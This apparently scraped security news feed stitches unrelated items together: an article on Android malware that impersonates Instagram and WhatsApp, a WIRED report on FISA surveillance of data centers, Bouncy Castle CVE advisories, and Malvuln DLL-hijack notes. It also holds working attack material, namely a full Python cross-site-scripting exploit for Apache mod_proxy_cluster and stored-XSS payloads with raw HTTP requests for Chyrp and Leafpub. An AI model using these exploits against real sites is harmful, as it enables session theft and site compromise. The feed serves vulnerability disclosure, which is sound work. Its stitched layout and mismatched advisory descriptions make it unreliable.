By Deeba Ahmed
Android Security Alert- Hackers are disguising malware as popular apps like Instagram and Snapchat to steal your login details. Learn how to identify fake apps and protect yourself from this sneaky cyberattack.
This is a post from HackRead.com Read the original post: Android Malware Poses as WhatsApp, Instagram, Snapchat to Steal Data

Imagine opening your favorite social media app, only to unknowingly hand over your login details to a sneaky hacker. That’s what is happening with Android users targeted by a malicious new malware campaign.

The SonicWall Capture Labs threat research team reports that threat actors are using malicious Android apps to impersonate popular online services like Google, Instagram, Snapchat, WhatsApp, and X. These apps aim to steal sensitive data from vulnerable Android phones, including contacts, text messages, call logs, and passwords.

These apps look legitimate due to using familiar logos and names to trick unsuspecting users and hide in plain sight. When opened, the app requests access to two permissions: Android Accessibility Service and Device Admin Permission. If the victim grants these permissions, the app can gain full control of the device.

“By requesting these permissions, the malicious app aims to gain control over the victim’s device, potentially allowing it to carry out harmful actions or steal sensitive information without the user’s awareness or consent,” SonicWall’s blog post read.

The malicious app then establishes a connection with a hacker-controlled C2 server, receiving additional instructions. It can read messages, call logs, access notification data, send messages, install malware, and open malicious websites for phishing purposes. 

Moreover, the app redirects victims to fake login pages of popular services like Facebook, GitHub, Instagram, Netflix, PayPal, LinkedIn, Microsoft, X, WordPress, and Yahoo, etc., prompting them to enter their username and password.

This information is shared with hackers, who can steal accounts, commit fraud, or even identity theft if sensitive personal information, including driver’s license or Social Security number, is stored on services like OneDrive.

Researchers are, however, unsure about how these apps end up on the best Android phones, but they suspect they are distributed through phishing sites, emails, text messages, or bundled with pirated software.

Fake Instagram app (left) – Fake Instagram and PayPal login page (Screengrabs: SonicWall Capture Labs)

This development follows security firms Symantec and Cyfirma’s recent warning of a social engineering campaign using WhatsApp to spread a new Android malware, posing as a defence-related application. 

To avoid falling victim to deceptive malware, stay vigilant and download apps from the official Google Play Store, ensuring they are legitimate and not from third-party stores or suspicious websites. Be wary of apps requesting excessive permissions, especially those unrelated to the app’s core function.

1.  New iOS Trojan “GoldPickaxe” Steals Facial Recognition Data
2.  Fake Skype, Zoom Apps Infecting Devices with Multiple RATs
3.  Fake Chrome Updates Spread Android Brokewell Banking Malware
4.  SpyNote Android Spyware Poses as Legit Crypto Wallets, Steals Funds
5.  Android Banking Malware FjordPhantom Steals Funds Via Virtualization

Android Malware Poses as WhatsApp, Instagram, Snapchat to Steal Data

A coalition of digital rights groups is demanding the US declassify records that would clarify just how expansive a major surveillance program really is.

Last month, US president Joe Biden signed a surveillance bill enhancing the National Security Agency’s power to compel US businesses to wiretap communications going in and out of the country. The changes to the law have left legal experts largely in the dark as to the true limits of this new authority, chiefly when it comes to the types of companies that could be affected. The American Civil Liberties Union and organizations like it say the bill has rendered the statutory language governing the limits of a powerful wiretap tool overly vague, potentially subjecting large swaths of corporate America to warrantless and secretive surveillance practices.

In April, Congress rushed to extend the US intelligence system’s “crown jewel,” Section 702 of the Foreign Intelligence Surveillance Act (FISA). The spy program allows the NSA to wiretap calls and messages between Americans and foreigners abroad—so long as the foreigner is the individual being “targeted” and the intercept serves a significant “foreign intelligence” purpose. Since 2008, the program has been limited to a subset of businesses that the law calls “electronic communications service providers,” or ECSPs—corporations such as Microsoft and Google, which provide email services, and phone companies like Sprint and AT&T.

In recent years, the government has worked quietly to redefine what it means to be an ECSP in an attempt to extend the NSA’s reach, first unilaterally and now with Congress’ backing. The issue remains that the bill Biden signed last month contains murky language that attempts to redefine the scope of a critical surveillance program. In response, a coalition of digital rights organizations, including the Brennan Center for Justice to the Electronic Frontier Foundation, is pressing the US attorney general, Merrick Garland, and the nation’s top spy, Avril Haines, to declassify details about a relevant court case that could, they say, shed much-needed light on the situation.

In a letter to the top officials, more than 20 such organizations say they believe the new definition of an ECSP adopted by Congress might “permit the NSA to compel almost any US business to assist” the agency, noting that all companies today provide some sort of “service” and have access to equipment on which “communications” are stored.

“Deliberately writing overbroad surveillance authorities and trusting that future administrations will decide not to exploit them is a recipe for abuse,” the letter says. “And it is entirely unnecessary, as the administration can—and should—declassify the fact that the provision is intended to reach data centers.”

The Justice Department confirmed receipt of the letter on Tuesday but referred WIRED to the Office of the Director of National Intelligence, which has primary purview over declassification decisions. The ODNI has not responded to a request for comment.

It is widely believed—and has been reported—that data centers are the intended target of this textual change. Matt Olsen, the assistant US attorney general for national security, appeared on an April 17 episode of the _Lawfare_ podcast to say that, while unable to confirm or deny any specifics, data centers today store a significant amount of communications data and are an “example” of why the government viewed the change as necessary.

A DOJ spokesperson pointed WIRED to an April 18 letter by Garland that claims the new ECSP definition is “narrowly tailored.” The letter includes written reflections on the provision by the assistant attorney general, Carlos Uriarte, who writes that the “fix” is meant to address a “critical intelligence gap” resulting from changes in technology over the past 15 years. According to Uriarte, the DOJ has committed to applying the new definition internally “to cover the type of service provider at issue” before the court.

Ostensibly this means the government is promising to limit future surveillance directives to data centers (in addition to the companies traditionally defined as ECSPs).

The surveillance court that oversees FISA and the appeals court that reviews its decisions sided two years ago with an unidentified company that fought back after being served an NSA order. Both courts ruled that it did not, in fact, appear to meet the criteria for being considered an ECSP, as only part of its function was storing communications data. Finding the government’s interpretation of the statute overly broad, the court reminded the government that only Congress has the “competence and constitutional authority” to rewrite the law.

Digital rights groups argue that declassifying additional information about this FISA case may help the public understand which types of businesses are actually subject to NSA directives. Practically speaking, they say, that information is no longer a secret anyway. “Declassifying this information would cause little if any national security harm,” the letter says. “The New York Times has already revealed that the relevant FISC case addressed data centers for cloud computing.”

In the aftermath of the FISA court’s ruling, the NSA and other spy agencies began lobbying the House and Senate intelligence committees to aid the administration in redefining what it means to be an ECSP. Members of both committees have subsequently portrayed the court’s ruling as a “directive” that Congress needs to expand the NSA’s reach. In a floor speech last month, Mark Warner, the chair of the Senate Intelligence Committee, said, “So what happened was, the FISA Court said to Congress: You guys need to close this loophole; you need to close this and change this definition.”

But in fact what the court asserted was that the government had exceeded its authority and that it was Congress’ job, not the Justice Department’s, to revise the law. “Any unintended gap in coverage revealed by our interpretation is, of course, open to reconsideration by the branches of government whose competence and constitutional authority extend to statutory revision,” the court said.

This would culminate in new language being proposed that quickly alarmed legal experts, including top civil liberties attorneys who’ve appeared before the secret court in the past. The surveillance fears quickly spread to Silicon Valley. The Information Technology Industry Council, one of the tech industry's top lobbying arms, warned that companies like Facebook and IBM were interpreting the bill as having “vastly expanded the US government’s warrantless surveillance capabilities.”

This expansion, the firm added, would also hinder the “competitiveness of US technology companies” and arguably imperil the “continued global free flow of data between the US and its allies.” Customers internationally, it argued, would likely begin taking their business elsewhere should the US government turn data centers into surveillance watering holes.

Concerns about the new ECSP definition have been circulating since December. While largely dismissing them, members of the House and Senate intelligence committees made a few adjustments in February, exempting a handful of business types. This came in response to popular concerns that Starbucks employees and hotel IT staff might be secretly conscripted by the NSA. FISA experts such as Marc Zwillinger—a private attorney who has appeared twice before the FISA Court of Review—noted in response to those adjustments that Congress’ rush to exempt a handful of businesses only served to demonstrate that the text was inherently too broad.

Intelligence committee members kept the pressure on lawmakers to reauthorize the Section 702 program with the sought-after language, going as far as to suggest that another 9/11-style attack might occur if they failed. The power of the committees was on full display, as while neither actually have primary jurisdiction over FISA, a majority of the Section 702 bill that passed was authored by intelligence committee staff.

Even while supporting the new framework and dismissing the intensity of civil society’s concerns, Warner did eventually step forward to acknowledge the new ECSF definition needed additional tweaking. First, on the Senate floor in April, he said that Garland shared his “view” that the language “could have been drafted better.” Later, in response to questions from reporters, he added: “I’m absolutely committed to getting that fixed.”

That appears unlikely to happen soon. According to The Record, Warner indicated that the best time to update the language again would be in the “next intelligence bill,” presumably referring to legislation this fall broadly reauthorizing the intelligence community’s work.

In the meantime, however, more than half of Congress is running for election, and the next US president will have greater surveillance powers than any other before. No one can say for sure who that president will be or how they’ll make use of that authority.

_Updated 2:20 pm ET, May 14, 2024, to clarify statements by Matt Olsen, assistant US attorney general for national security, to the_ Lawfare _podcast._

Secrecy Concerns Mount Over Spy Powers Targeting US Data Centers

An issue was discovered in Bouncy Castle Java TLS API and JSSE Provider before 1.78. Timing-based leakage may occur in RSA based handshakes because of exception processing.

Skip to content

**Navigation Menu**

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-30171

**Bouncy Castle affected by timing side-channel for RSA key exchange ("The Marvin Attack")**

Moderate severity GitHub Reviewed Published May 14, 2024 to the GitHub Advisory Database • Updated May 14, 2024

**Package**

nuget BouncyCastle (NuGet)

**Affected versions**

< 2.3.1

nuget BouncyCastle.Cryptography (NuGet)

maven org.bouncycastle:bcpkix-jdk14 (Maven)

maven org.bouncycastle:bcpkix-jdk15to18 (Maven)

maven org.bouncycastle:bcpkix-jdk18on (Maven)

maven org.bouncycastle:bcprov-jdk14 (Maven)

maven org.bouncycastle:bcprov-jdk15on (Maven)

maven org.bouncycastle:bcprov-jdk15to18 (Maven)

maven org.bouncycastle:bcprov-jdk18on (Maven)

maven org.bouncycastle:bctls-fips (Maven)

maven org.bouncycastle:bctls-jdk14 (Maven)

maven org.bouncycastle:bctls-jdk15to18 (Maven)

maven org.bouncycastle:bctls-jdk18on (Maven)

**Description**

Published to the GitHub Advisory Database

May 14, 2024

Last updated

May 14, 2024

GHSA-v435-xc8x-wvr9: Bouncy Castle affected by timing side-channel for RSA key exchange ("The Marvin Attack")

An issue was discovered in ECCurve.java and ECCurve.cs in Bouncy Castle Java (BC Java) before 1.78, BC Java LTS before 2.73.6, BC-FJA before 1.0.2.5, and BC C# .Net before 2.3.1. Importing an EC certificate with crafted F2m parameters can lead to excessive CPU consumption during the evaluation of the curve parameters.

Skip to content

**Navigation Menu**

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-29857

**Bouncy Castle certificate parsing issues cause high CPU usage during parameter evaluation.**

Moderate severity GitHub Reviewed Published May 14, 2024 to the GitHub Advisory Database • Updated May 14, 2024

**Package**

nuget BouncyCastle (NuGet)

**Affected versions**

< 2.3.1

nuget BouncyCastle.Cryptography (NuGet)

maven org.bouncycastle:bc-fips (Maven)

maven org.bouncycastle:bcpkix-jdk14 (Maven)

maven org.bouncycastle:bcpkix-jdk15to18 (Maven)

maven org.bouncycastle:bcpkix-jdk18on (Maven)

maven org.bouncycastle:bcprov-jdk14 (Maven)

maven org.bouncycastle:bcprov-jdk15on (Maven)

maven org.bouncycastle:bcprov-jdk15to18 (Maven)

maven org.bouncycastle:bcprov-jdk18on (Maven)

maven org.bouncycastle:bctls-jdk14 (Maven)

maven org.bouncycastle:bctls-jdk15to18 (Maven)

maven org.bouncycastle:bctls-jdk18on (Maven)

**Description**

Published to the GitHub Advisory Database

May 14, 2024

Last updated

May 14, 2024

GHSA-8xfc-gm6g-vgpv: Bouncy Castle certificate parsing issues cause high CPU usage during parameter evaluation.

An issue was discovered in Bouncy Castle Java Cryptography APIs before 1.78. An Ed25519 verification code infinite loop can occur via a crafted signature and public key.

Skip to content

**Navigation Menu**

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-30172

**Bouncy Castle crafted signature and public key can be used to trigger an infinite loop**

Moderate severity GitHub Reviewed Published May 14, 2024 to the GitHub Advisory Database • Updated May 14, 2024

**Package**

nuget BouncyCastle (NuGet)

**Affected versions**

< 2.3.1

nuget BouncyCastle.Cryptography (NuGet)

maven org.bouncycastle:bcpkix-jdk14 (Maven)

maven org.bouncycastle:bcpkix-jdk15to18 (Maven)

maven org.bouncycastle:bcpkix-jdk18on (Maven)

maven org.bouncycastle:bcprov-jdk14 (Maven)

maven org.bouncycastle:bcprov-jdk15on (Maven)

maven org.bouncycastle:bcprov-jdk15to18 (Maven)

maven org.bouncycastle:bcprov-jdk18on (Maven)

maven org.bouncycastle:bctls-jdk14 (Maven)

maven org.bouncycastle:bctls-jdk15to18 (Maven)

maven org.bouncycastle:bctls-jdk18on (Maven)

**Description**

Published to the GitHub Advisory Database

May 14, 2024

Last updated

May 14, 2024

GHSA-m44j-cfrm-g8qc: Bouncy Castle crafted signature and public key can be used to trigger an infinite loop

TrojanSpy.Win64.EMOTET.A malware suffers from a code execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/f917c77f60c3c1ac6dbbadbf366ddd30.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: TrojanSpy.Win64.EMOTET.A Vulnerability: Arbitrary Code ExecutionDescription: The malware looks for and executes a x64-bit "CRYPTBASE.dll" PE file in its current directory. Therefore, we can hijack the DLL and execute our own code to intercept and terminate the malware. Once loaded the exploit dll will check if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. Leverage RansomLord v3 for DLL generation, while written as a proof-of-concept to specifically defeat ransomware, it can also be used to generate DLLs to try an exploit other types of malwares. All basic tests were conducted successfully in a virtual machine environment.Family: EMOTETType: PE64MD5: f917c77f60c3c1ac6dbbadbf366ddd30SHA256: b76fbc81bbb7f3108d27d9da9e2646aeb3769fba62bf7961f79306812de3486cVuln ID: MVID-2024-0684Disclosure: 05/14/2024Exploit/PoC:1) Download RansomLord v3    https://github.com/malvuln/RansomLord2) Locate the x64 CRYPTBASE.dll entry using the -m flag (DLL Map)3) Use -g flag (Generate Exploit) to output an x64 DLL CRYPTBASE.dll, based on an existing vulnerable malware in the victims list.4) (Optional) -e flag to setup Windows event IOC logging in the registry, this will log the SHA256 hash, full path and filename.Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

TrojanSpy.Win64.EMOTET.A MVID-2024-0684 Code Execution

Backdoor.Win32.AsyncRat malware suffers from a code execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/2337b9a12ecf50b94fc95e6ac34b3ecc.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.AsyncRatVulnerability: Arbitrary Code ExecutionDescription: The malware looks for and executes a x32-bit "CRYPTSP.dll" PE file in its current directory. Therefore, we can hijack the DLL and execute our own code to intercept and terminate the malware. Once loaded the exploit dll will check if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. Leverage RansomLord v3 for DLL generation, while written as a proof-of-concept to specifically defeat ransomware, it can also be used to generate DLLs to try an exploit other types of malwares. All basic tests were conducted successfully in a virtual machine environment.Family: AsyncRatType: PE32MD5: 2337b9a12ecf50b94fc95e6ac34b3eccSHA256: 3c703ecb3e8c54e352ff39fadbe789bb2313f848bd69551b07bf2ed0a58744b9Vuln ID: MVID-2024-0683Disclosure: 05/14/2024Exploit/PoC:1) Download RansomLord v3    https://github.com/malvuln/RansomLord2) Locate the x32 CRYPTSP.dll entry using the -m flag (DLL Map)3) Use -g flag (Generate Exploit) to output an x32 DLL CRYPTSP.dll, based on an existing vulnerable malware in the victims list.4) (Optional) -e flag to setup Windows event IOC logging in the registry, this will log the SHA256 hash, full path and filename.Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.AsyncRat MVID-2024-0683 Code Execution

Apache mod_proxy_cluster suffers from a cross site scripting vulnerability.

    import requestsimport argparsefrom bs4 import BeautifulSoupfrom urllib.parse import urlparse, parse_qs, urlencode, urlunparsefrom requests.exceptions import RequestExceptionclass Colors:    RED = '\033[91m'    GREEN = '\033[1;49;92m'    RESET = '\033[0m'def get_cluster_manager_url(base_url, path):    print(Colors.GREEN + f"Preparing the groundwork for the exploitation on {base_url}..." + Colors.RESET)    try:        response = requests.get(base_url + path)        response.raise_for_status()    except requests.exceptions.RequestException as e:        print(Colors.RED + f"Error: {e}" + Colors.RESET)        return None    print(Colors.GREEN + f"Starting exploit check on {base_url}..." + Colors.RESET)    if response.status_code == 200:        print(Colors.GREEN + f"Check executed successfully on {base_url}..." + Colors.RESET)        # Use BeautifulSoup to parse the HTML content        soup = BeautifulSoup(response.text, 'html.parser')        # Find all 'a' tags with 'href' attribute        all_links = soup.find_all('a', href=True)        # Search for the link containing the Alias parameter in the href attribute        cluster_manager_url = None        for link in all_links:            parsed_url = urlparse(link['href'])            query_params = parse_qs(parsed_url.query)            alias_value = query_params.get('Alias', [None])[0]            if alias_value:                print(Colors.GREEN + f"Alias value found" + Colors.RESET)                cluster_manager_url = link['href']                break        if cluster_manager_url:            print(Colors.GREEN + f"Preparing the injection on {base_url}..." + Colors.RESET)            return cluster_manager_url        else:            print(Colors.RED + f"Error: Alias value not found on {base_url}..." + Colors.RESET)            return None    print(Colors.RED + f"Error: Unable to get the initial step on {base_url}")    return Nonedef update_alias_value(url):    parsed_url = urlparse(url)    query_params = parse_qs(parsed_url.query, keep_blank_values=True)    query_params['Alias'] = ["<DedSec-47>"]    updated_url = urlunparse(parsed_url._replace(query=urlencode(query_params, doseq=True)))    print(Colors.GREEN + f"Injection executed successfully on {updated_url}" + Colors.RESET)    return updated_urldef check_response_for_value(url, check_value):    response = requests.get(url)    if check_value in response.text:        print(Colors.RED + "Website is vulnerable POC by :")        print(Colors.GREEN + """          ____           _ ____                  _  _ _____          |  _ \  ___  __| / ___|  ___  ___      | || |___  |         | | | |/ _ \/ _` \___ \ / _ \/ __| ____| || |  / /          | |_| |  __/ (_| |___) |  __/ (_  |____|__  | / /           |____/ \___|\__,_|____/ \___|\___|        |_|/_/                                        github.com/DedSec-47    """)    else:        print(Colors.GREEN + "Website is not vulnerable POC by :")        print(Colors.GREEN + """          ____           _ ____                  _  _ _____          |  _ \  ___  __| / ___|  ___  ___      | || |___  |         | | | |/ _ \/ _` \___ \ / _ \/ __| ____| || |  / /          | |_| |  __/ (_| |___) |  __/ (_  |____|__  | / /           |____/ \___|\__,_|____/ \___|\___|        |_|/_/                                        github.com/DedSec-47    """)def main():    # Create a command-line argument parser    parser = argparse.ArgumentParser(description="python CVE-2023-6710.py -t https://example.com -u /cluster-manager")    # Add a command-line argument for the target (-t/--target)    parser.add_argument('-t', '--target', help='Target domain (e.g., https://example.com)', required=True)    # Add a command-line argument for the URL path (-u/--url)    parser.add_argument('-u', '--url', help='URL path (e.g., /cluster-manager)', required=True)    # Parse the command-line arguments    args = parser.parse_args()    # Get the cluster manager URL from the specified website    cluster_manager_url = get_cluster_manager_url(args.target, args.url)    # Check if the cluster manager URL is found    if cluster_manager_url:        # Modify the URL by adding the cluster manager value        modified_url = args.target + cluster_manager_url        modified_url = update_alias_value(args.target + cluster_manager_url)        print(Colors.GREEN + "Check executed successfully" + Colors.RESET)        # Check the response for the value "<DedSec-47>"        check_response_for_value(modified_url, "<DedSec-47>")if __name__ == "__main__":    main()

Apache mod_proxy_cluster Cross Site Scripting

Chryp version 2.5.2 suffers from a persistent cross site scripting vulnerability.

    # Chyrp 2.5.2 - Stored Cross-Site Scripting (XSS)# Date: 2024-04-24# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://github.com/chyrp/# Software Link: https://github.com/chyrp/chyrp/archive/refs/tags/v2.5.2.zip# Version: 2.5.2# Tested on: MacOS### Steps to Reproduce ###- Login from the address: http://localhost/chyrp/?action=login.- Click on 'Write'.- Type this payload into the 'Title' field: "><img src=x onerror=alert("Stored")>- Fill in the 'Body' area and click 'Publish'.- An alert message saying "Stored" will appear in front of you.### PoC Request ###POST /chyrp/admin/?action=add_post HTTP/1.1Host: localhostCookie: ChyrpSession=c4194c16a28dec03e449171087981d11;show_more_options=trueUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)Gecko/20100101 Firefox/124.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate, brContent-Type: multipart/form-data;boundary=---------------------------28307567523233313132815561598Content-Length: 1194Origin: http://localhostReferer: http://localhost/chyrp/admin/?action=write_postUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: close-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="title""><img src=x onerror=alert("Stored")>-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="body"<p>1337</p>-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="status"public-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="slug"-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="created_at"04/24/24 12:31:57-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="original_time"04/24/24 12:31:57-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="trackbacks"-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="feather"text-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="hash"11e11aba15114f918ec1c2e6b8f8ddcf-----------------------------28307567523233313132815561598--

Chyrp 2.5.2 Cross Site Scripting

Leafpub version 1.1.9 suffers from a persistent cross site scripting vulnerability.

    # Leafpub 1.1.9 - Stored Cross-Site Scripting (XSS)# Date: 2024-04-24# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://github.com/Leafpub# Software Link: https://github.com/Leafpub/leafpub# Version: 1.1.9# Tested on: MacOS### Steps to Reproduce ###- Please login from this address: http://localhost/leafpub/admin/login- Click on the Settings > Advanced- Enter the following payload into the "Custom Code" area and save it: ("><imgsrc=x onerror=alert("Stored")>)- An alert message saying "Stored" will appear in front of you.### PoC Request ###POST /leafpub/api/settings HTTP/1.1Host: localhostCookie:authToken=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3MTM5NjQ2MTcsImV4cCI6MTcxMzk2ODIxNywiZGF0YSI6eyJ1c2VybmFtZSI6ImFkbWluIn19.967N5NYdUKxv1sOXO_OTFiiLlm7sfgDWPXKX7iEZwloUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)Gecko/20100101 Firefox/124.0Accept: */*Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 476Origin: http://localhostReferer: http://localhost/leafpub/admin/settingsSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: closetitle=A+Leafpub+Blog&tagline=Go+forth+and+create!&homepage=&twitter=&theme=range&posts-per-page=10&cover=source%2Fassets%2Fimg%2Fleaves.jpg&logo=source%2Fassets%2Fimg%2Flogo-color.png&favicon=source%2Fassets%2Fimg%2Flogo-color.png&language=en-us&timezone=America%2FNew_York&default-title=Untitled+Post&default-content=Start+writing+here...&head-code=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22Stored%22)%3E&foot-code=&generator=on&mailer=default&maintenance-message=&hbs-cache=on

Tag

#git